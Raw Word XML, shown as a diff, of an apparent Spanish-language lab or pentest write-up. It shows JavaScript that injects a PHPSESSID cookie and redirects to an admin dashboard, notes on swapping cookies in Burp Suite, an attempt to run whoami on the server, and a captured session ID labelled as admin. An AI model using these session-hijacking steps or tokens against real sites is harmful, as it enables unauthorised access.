+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"Fallo en el inicio de sesión automático"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>    };</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>xhr.send</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(body);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>  &lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>&lt;div&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="383A42"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>div</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">  &lt;script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    // Establecer la cookie de sesión</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>document.cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = "PHPSESSID=bpu0b846jkl6d6ih8f5vc79cb4; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>path</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=/";</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    // Verificar si ya estamos </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>logueados</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> redirigiendo a una página interna</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>window.location</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.href</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = "/admin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dashboard.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:t>&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>div</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Una idea sería intentar modificar el DOM de la página de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>login</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> para ocultar el formulario de inicio de sesión y redirigir automáticamente al usuario a una página interna que supuestamente requiere autenticación, esperando que la aplicación web tenga una mala gestión de sesiones o que la cookie de sesión que has inyectado sea suficiente para considerarte como autenticado. Aquí tienes un ejemplo de cómo podría implementarse:</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CECD0C9" wp14:editId="4B159AA8">
+            <wp:extent cx="5400040" cy="1185545"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1853424414" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1853424414" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId23"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="1185545"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Otra </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cooke</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> diferente al capturar</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Voya</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> modificar el </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>burpsuite</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> la cookie para que </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>coiniicda</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> con la del navegador</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Este script simplemente intenta redirigir al usuario directamente a una página interna del panel de administración (`/admin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dashboard.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>` en este caso), con la esperanza de que la cookie de sesión `PHPSESSID` que has establecido manualmente sea suficiente para autenticarte como un usuario válido.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66F080EA" wp14:editId="7E71F3DD">
+            <wp:extent cx="5400040" cy="3484245"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
+            <wp:docPr id="1901312154" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1901312154" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId24"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="3484245"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Vamos a probar en vez de acceder directamente a como administrador, intentar sacar una </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cooke</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> de administrador a ver si es </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>aposible</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7177A9AD" wp14:editId="7C805E02">
+            <wp:extent cx="5400040" cy="3469005"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="350070962" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="350070962" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="3469005"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">No existe la carpeta </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>collet</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> – cookie, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>asi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> que voy a intentar ejecutar el </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comandfo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>whoamien</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> el servidor, y </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>asi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> conseguir información de los usuarios si me permite ejecutar comandos, a ver</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F9E9E36" wp14:editId="6CF54FE8">
+            <wp:extent cx="5400040" cy="3236595"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
+            <wp:docPr id="759013456" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="759013456" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId26"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="3236595"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BEF3052" wp14:editId="521DA516">
+            <wp:extent cx="2943636" cy="2772162"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+            <wp:docPr id="1044710170" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1044710170" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId27"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2943636" cy="2772162"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>PHPSESSID</w:t>
+      </w:r>
+      <w:r>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:t>"jj168ic8gkcngr0u4tmg6kt7v7"</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> == ADMIN</w:t>
+      </w:r>
+    </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1701" w:bottom="1417" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
@@ -49,6 +5769,251 @@
     </w:sectPr>
   </w:body>
 </w:document>
+</file>
+
+<file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du wp14">
+  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="0CEB4E6D"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="D4E25EFE"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
